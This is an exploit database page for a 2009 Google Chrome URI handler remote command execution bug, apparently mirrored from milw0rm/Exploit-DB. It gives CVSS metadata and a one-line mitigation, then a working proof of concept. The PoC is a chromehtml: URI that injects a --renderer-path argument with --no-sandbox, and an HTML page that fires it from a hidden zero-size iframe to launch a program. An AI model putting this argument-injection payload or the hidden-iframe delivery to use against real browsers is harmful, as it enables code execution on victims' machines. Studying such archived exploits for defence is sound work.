header-logo
Suggest Exploit
vendor:
Chrome
by:
milw0rm.com
9.3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Chrome
Affected Version From: 1.0.154.46
Affected Version To: 1.0.154.46
Patch Exists: YES
Related CWE: N/A
CPE: a:google:chrome
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP/Vista, IE6/IE7
2009

Chrome URI Handler Remote Command Execution PoC

This PoC exploits a vulnerability in Google Chrome which allows remote attackers to execute arbitrary code via a crafted HTML document containing a chromehtml URI with a --renderer-path argument, which is not properly handled when the --no-sandbox argument is also used.

Mitigation:

Google Chrome should be updated to the latest version.
Source

Exploit-DB raw data:

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter  :) 
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

<html><head><title>Chrome URI Handler Remote Command Execution PoC</title></head>
<body>
<h3>This is a test</h3>
<iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0></iframe>
</body></html>

# milw0rm.com [2009-01-30]

Navigation

Suggest Exploit

Services By CQR